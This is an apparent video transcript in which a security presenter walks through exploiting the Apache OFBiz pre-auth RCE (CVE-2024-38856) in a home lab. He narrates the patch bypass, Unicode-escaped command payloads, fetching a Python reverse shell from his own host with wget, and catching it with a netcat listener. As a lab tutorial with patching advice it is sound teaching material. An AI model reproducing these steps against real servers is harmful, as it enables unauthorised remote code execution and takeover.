Hey, greetings everyone, and welcome back to my cybersecurity show. And it's going to be an exciting episode today because guess what? We are going to be executing a remote code execution vulnerability. That's right, RCE's unauthenticated, no less. A real dumpster fire of a vulnerability. That's right, and it's going to be affecting the Apache OFBiz ERP. It's not that OF. Nope. I know where I can feel it. You're laughing like a 6th grade boy. Guilty as charged, but that is not the OF biz that we're talking about. Not that biz. This is the Open for Business ERP. What the hell's an ERP? Well, glad you asked. It's in our Hacker News article right here. It says a new 0-day flaw, but I don't really believe it's a 0-day anymore because there is a patch for this. Spoiler alert. So if you're running the Apache OFBiz ERP system, you might want to run out there and go ahead and patch that if you have not recently. Let's go ahead and make that happen. Because this is really bad, and I was able to get reverse shell, with the bits and bobs that I learned reading these articles. So we can see that this is tracked as an ERP. You might be asking, what's that? Enterprise Resource Planning System. I guess that's where you have a large business, you have resources in said business, and you need to plan to do things with them. You can use this software to do so. I don't really know. Didn't really care to learn that much about it, honestly, other than the fact, can I exploit it? And yes, I can. Track to CVE 2024-38856. The flaw has a CVSS score of 9.8. Ooh, out of a maximum 10. You hate to see that happen, kids. That is not fun. Says it affects Apache OFBiz versions prior to 8.12.15. Like I said, if you are running OFBiz and you have it patched, would you go ahead and pause and get that update done? Welcome back. Glad to hear that you are now secure. That's good to know. All right. So there is an unauthenticated RCE in this system. And the way I found out how to do this was I went to the actual article that was written up by SonicWall and their security research blog. Here it is right here. We move on down the road and we get all the pertinent details necessary. It's going to go through, obviously, a lot of information. I'm not going to break it all down, just kind of give you some relevant information as it becomes relevant, right? But ultimately, they were looking for flaws in OFBiz because guess what? It has had previous flaws that I believe they did discover. Yeah, it says right here, this is the second major flaw SonicWall has discovered in Apache OFBiz in recent months. So this is kind of their hobby horse right now, apparently, right? The first one they saw was, I think it was, unauthenticated craft. It was a path traversal that led to RCE, but this one doesn't even need the path traversal. It just kind of goes around all that. Fun fact is they apparently attempted, I didn't say attempted, they did patch that path traversal RCE, but SonicWall was able to figure out an actual workaround of that path traversal patch. So they just was like, well, what if we take the path traversal out? Because what they did was basically said, hey, these path traversal characters, wrong-o, no thanks. And they kind of did some filtering to take that stuff out, give you an error. We will see that here momentarily. All right. So let's get back into this. There's their little video showing you that they were able to get reverse shell on that. It says Apache OpenBiz. Any interesting? Oh, it does kind of give you some information about OpenBiz or OFBiz. Should I say not OpenBiz? OFBiz. It says that approximately 170 companies use that. 41% of those users are in the States. 19% in India, 7% in Germany, 6% in France, 5% in the UK. Used by companies like Atlassian, United Airlines, Grow ERP, Lindt Chocolate, Delicious, Home Depot, Cognizant Technology Solutions Corp, Titan Industries, HP Development, and Upwork Global. Some of the major industries include technology and services, computer software, internet, and retail. So all that to say, it seems to be a big deal, right? So again, if you haven't gone and patched, go ahead and pause and do that now. Don't wait for me to show you how bad it can get, okay? Real quick before we get too far, just a obligatory warning that you should not be using anything that you see here for illegal purposes. You should only be using the things that you learn here for learning environments, increasing security, and of course, only against systems that you have expressed permission to access or to hack against, or things that you actually own. That was fun. Thanks. Back to the show. So let's get back in here. They were kind of kicking around on this thing. This is where the technical overview starts, and this is where all the relevant information necessary to kind of repeat what they had done starts to show itself. So they said they were analyzing 2024 36104, disclosed on June 3rd, another unauthenticated RCE using path traversal. We noticed that the control servlet, bing, bing, bing. This is where it kind of gets in technical details that aren't super relevant. Basically, what they ended up doing was they were working on this thing. There was some POC that they were using to kind of kick at this CVE, or this CVE. That was the POC from another CVE, and it revealed some interesting information, right? Which they used to kind of work around the patch for that CVE. It went a little crazy. It's a little hard to follow, but it's there. I'll leave that to you. We don't have the time nor the inclination to go through that, right? So, but that POC is available right in this area. So I'm just going to open that up. Let's take a look at that POC. And we can see it's fairly straightforward, right? So you send a post request and you can throw this at it, right here. All this lovely action. And it just goes to this web tools control, forgot password, program export, endpoint. And here is the data that sends along with it. And it looks like it's throwing some Java code, right? I think this is Java or JavaScript. I think it's Java. I'm not a coder. I don't develop web applications. Don't yell at me if I'm getting that wrong, but I think it's Java. And we just have this like throw new exception. And right there, you can see it's asking for it to execute with ID. It wants to know what is the user that's running this. And then, there's the execute function or method, and then throw that out in some text. Right. Now, they also did it with Unicode right here. And you can see that's what all this loveliness is. This is a Unicode escaped Unicode, something to that effect. I can't remember off the top of my head, but we'll get into that as well, because we are actually going to use this as a part of our RCE, just like SonicWall did themselves. Okay, so now it's time for us to try to actually get some shell. First thing we need to do is obviously we need to be able to fire off requests to this thing using Burp. That's what I like to do anyway. Burp's always one of my go-to tools. So let's get Burp up and running, shall we? Let's see here. I'll go back to the PC and Burp Suite Community Edition. I should probably had Burp already running, but hey, what are you going to do? And basically, what we're going to do is this is kind of firing up. It looks like it's actually doing an update as well. Hey, thanks a lot, Burp. Love you to death, especially when I'm filming. Anywho, we're going to use the repeater function or tab or the facility that's inside of Burp to craft our perfect little request to the OFBiz server, and then fingies crossed, that should then fire off the remote code execution, which if it goes successfully, we eventually will have a shell. Okay, looks like Burp is about ready to rock. Let's jump back in. All right, Burp, let's hit next and start Burp. Burpage doing its thing. Do love me some Burp Suite. Yes, start your project, do your thing. I'm gonna click on the target tab. That way we just, actually I don't think I need the scope here or anything. Where'd you go, Burp? Just hit repeater. And to get started, yeah, I want to do this. What is it doing here? Yeah. I just want to hit new. Where's that? It used to have a plus sign. All right. Interesting. To get started, send a request to repeater from anywhere in Burp. So I have to actually do this. All right, fun stuff. Hit the proxy tab and let's shrink that. We will go to here and turn on the proxy using Foxy Proxy. And then I will just kind of, you know what I'll do? I'll just go to this forgot my password. Yes, I understand there is a security risk because it is using HTTPS and it is not on the internet. Accept the risk and continue. Thank you. Now we should be able to go to Burp, which I believe was over here. Bing, hit that HTTP history, and there it is. Cool. Let's go back over. Yeah, we need to keep the proxy on, which is probably pretty useful. And now I can just go to this like forgot password, or I can right click it here and send to repeater. Go to repeater, bada bing. I now have all the fun in the world to be able to work with this. Okay, so I don't even need that. I just needed this, add this tab, HTTP. This is what I want right here. Now, what are we going to do with that? Great question. Glad you asked. I'm actually going to move this over here. I'm going to jump back in here. I'm going to copy this code. So I copied this right here from the old GitHub repo with that POC that we looked at. I'm going to jump back over here. I'm going to bring up old Burp. And in the request, I am going to paste it in. Bada bing. Now, you're like, what the heck? You know, that Unicode stuff looks crazy. You know what I am going to do? I'm going to go into, I believe it's in settings. Is it in user interface display? Yeah, this font size is tiny. Let's make it like human readable and go to dark theme. God bless America. Yes. Yes, that is how we do it, ladies and gentlemen. All right, close these settings. And now we should be able to see this a little bit better, right? So in here, what I need to do is I already have the correct thing, right, where it's going. It's doing a post request. I just need to change the host. And for me, that's going to be 192.168.1.151. Perfect. And now, if I go ahead and hit send, yes, it's okay. Hit OK. Oh, I gotta uncheck this, I believe. No. I use HTTPS and take that off of there. Change that to 8443 and hit OK. Cool. Did I hit send? Yeah, hit send again. Bada bing. And now I'm going to change this view to side by side. If you hit this render tab, you can see right here we got a HTTP status of 500 internal server error. Crazy, right? But this is exactly what you should be seeing if you're using this version, which I am. And I'll make all the links and stuff available down in the description of the video, okay? But here we do see that for security reasons, this, well, of course, it's going to kind of give me crap about it. Where's that? Grab it. There we go. For security reasons, this URL is not accepted, it says. That security done jumped in here and did some damage to me. Well, okay. So it's not supposed to work. But if you read the article, if you go back to the SonicWall article, they were like, hey, we were able to get around this if we just took out. So it said, talking about the suspected root cause, relying on the authentication process, and that if they said, our suspicions led us to try to circumvent the patch. One test case we started working on was to send a raw URL without any path traversal vector. So if you look back in here at our path traversal, right around there, it shows a semicolon. You can see the selected text over on this side of the screen right there. So if you're like, I can't really see that, Daniel, it's over here, much larger, right? So all around, I'm going to give you a better highlight. Bam. You see that semicolon? That, for some strange reason, was the path traversal. I've never actually seen that myself, so it was an interesting thing. So what I'm going to do is I'm going to take that out, modify, and then resend. And then Look at that right there. It threw the ID command. I can see UID equals 1000 Billy. The user I set up, his name is Billy because I like Billy. Billy's my guy who always does dumb stuff. And he's like my foil that I set up a lot of things with. So Billy is running OFBiz, and it ran the ID command, RCE. That means we can run code. If I can run code, what else can I do? More than ID, I would expect. Now, you might be thinking, I'm about to do my root dance or whatever, at least some initial access dance, some shell dance, whatever you want to call it. And you might think, Dan, you are on the cusp of greatness, sir. It did not go as easily as I'd hoped, but eventually I did reach the mountaintop. What ended up being the problem is remember when we tried to run that first command from the POC with that semicolon in there, and it gave us that 500 error? I want to say one of three things maybe is happening. As I attempted to, because you're like, hey, bro, just instead of whatever the heck this is, all this Unicode garbage, right? Which is that whole, go back to the POC, which is basically, it's not basically, it is this, like I said, I think it's Java, throw, new exception, ID, execute. It's that in Unicode. That's just Unicode encoded instead of being actual text. So like, just change ID to reverse shell stuff and it's reverse shell time, right? Well, no. So I don't know if you have played or how much you have played around with different types of reverse shells. They almost always have funky characters like ampersands and greater than signs and pipe characters and semicolons. And as we just saw, it didn't really like those characters, especially that semicolon. So I'm going to just kind of give you what ended up happening was I could not get to just slap in code and have it go. So that's when I thought to myself, Daniel, what are we going to do here? What are we going to do? So to test this, I was using like a Python HTTP server. And that was great because I could see in the terminal logs when the requests were getting made. And I used that to kind of help me see what was going on and see what requests were being made and how they were coming through. And that did make me go, oh, look, it doesn't like this. It doesn't like that. All this is gone or all that's kind of smashed together. What's going on here? And I think that it was that security patch is stripping out my characters and not giving all the commands. So it wasn't completing. It wasn't because it wasn't a complete command. So I was never getting shell. So I thought to myself, what can I do? What's a quick fix to this to make this actually work? I thought, well, I can grab web pages. I'm just using like curl or wget to grab web pages from the Python. What if I just create a shell as a file, wget the file, and then just say execute the file? Let's see if that works, shall we? All right, so what are we going to do? Back in here. Let's get in the game. So what I did is I grabbed the old Unicode here, which I guess I can grab from Burp Suite. Maybe it's an easier way to go. I'm just going to grab all this. Just copy. Where's the old copy? There we go. Copy that. Jump back here. There's a site called Dencode. Dencode. If you've never been there, if you like CyberChef, it's not as nice looking as CyberChef, but it's super useful because CyberChef can do a lot. It didn't do exactly what I wanted to be able to, which is able to like slap this in here. Where's my paste? Why aren't you pasting? Control V. Yeah, bam. I can decode this is Unicode encoded strings, which I could not do. At least I couldn't see it in CyberChef. It didn't seem to be able to do that. So I can slap this in here and then kind of run down to where it says decoded. And you can see right there, Unicode escape. And it gives me the output right there. Woo-ha-ha. throw a new exception, right? Fun, fun, fun. It actually has an extra space in there that it shouldn't have. So I'm going to copy this. I go back to the top, and now I can take that out, paste this in, which it doesn't seem to like the paste, so Control V. Take this out. I think it has to be like that, if I'm remembering correctly. There's a space between new and exception. And now I can change ID and then encode it using Unicode encoding. Okay? So what do? So I need to grab a reverse shell, which I like to use Python. Python's just so useful. That tends to work. So that's what I've got. Let me jump over here to a terminal so I can show you this. I've got shell.py right here. So if I catch shell.py, you can see it's just a standard Python 3 shell. And there is the L host, yeah, and the L port, bada bing. So we're going to be going to that host IP on that port 444. 4 fours. That's all you need to know. So at that point, I can spin up Python 3 http.server. It helps if you do a -m Daniel -m. Fire that up on port 8000. Okay, so now I can serve this up. So let's head back to, here, Dencode. That's what I need. So what do I need it to do? I need it to wget http:// and 192.168.1.250 on port 8000 for shell.py. Cool. That works. It should download the shell and have it locally on the OFBiz server. So now I can just kind of scroll down and find where that has been encoded using the same Unicode escape, which is right here, Unicode escape. Hit the old copy. Cool, jump back into Burp, and then paste that into Burp. Hi, Burp. Work with us here. Paste. Bada bing. Now, let's see if it works. Hit send. Looking good. Render. We did get some weird error. We can go check and see if it was grabbed. And I do see a get for shell.py from 151. Isn't it nice to be able to see these things? So special. So special. Okay, now, the next thing I want to do is fire off that shell with Python. So I'm just going to change again, go back into Dencode, change my command, because I have command execution, to Python 3 and run the shell.py. I don't even have to chmod it because Python will just go, cool, Python. I like Python. Python's fun. I do enjoy it. I will need to go ahead and fire up a listener. I'm trying to think, do I need the HTTP server at all anymore? I don't believe so. So let's go ahead. Let's get back in here. I will Control C that. Clear, and I'll run just netcat-nvlp on port 44s. Fire it off. Cool. All right, back to Dencode. Jump up here, change this to, I don't need a wget, I just need to do Python 3, and it is shell.py. Yeah, did I do that right? Feel like, you know what, I removed a, I knew it looked a little strange. I grabbed a little single quote out of there and accidentally deleted it. It's little things like that that'll really put some hitch in your giddy up, that's for sure. Okay, so now I should be able to just kind of go back down to the encoded area, and I don't know if this has changed or not, but I'm just going to copy it and see what it does. I can check 74 and it ends in 3B. What did we have before? Started 74. It might not have changed yet. So let's load. I don't need to scan a QR code, just do it. I think it's good though. I think it's all good. Yeah, because it's going to be It's going to be similar at the end front now. I am a crazy person. Duh, Daniel. Only the relevant bits will have changed. The very beginning and the very end will not have changed. Hello! It's fun being crazy. Just copy this and do it. All right, so there we go. Let's change this. Paste it in. Come on. There you go. Paste. I guess I Control V it. Now, if we hit send, fingers crossed, we should get that reverse shell we all hopefully look for in our lives that we love so much. Oh my goodness, connection received. Oh, who am I? Oh, I'm Billy. ID Billy. Excellent, doing LS. There's all the stuff. Manischewitz. Wasn't that fun? So now I could do like they did and create a script for automating all this. So I just have to fire the script off. I don't have to go through all that process of encoding and decoding and using Burp Suite and all that fun stuff. But man, that was a joy and a pleasure all wrapped up in one. Like I said, if you're running Apache OFBiz, definitely go ahead and update that thing to the latest version. They have alerts and stuff already out. So hopefully you've gotten those and you've made those patches or you've done those patches to your systems. If not, you're asking for trouble because that was super, I say super easy. It just took some time figuring out what exactly it was that SonicWall did so I could reproduce it. But very, very cool. Hopefully you enjoyed that. If you like more security content, make sure to subscribe to the channel. Give me the old thumbs up if you liked it. It really helps out. So I appreciate you watching. Until next time, keep hacking.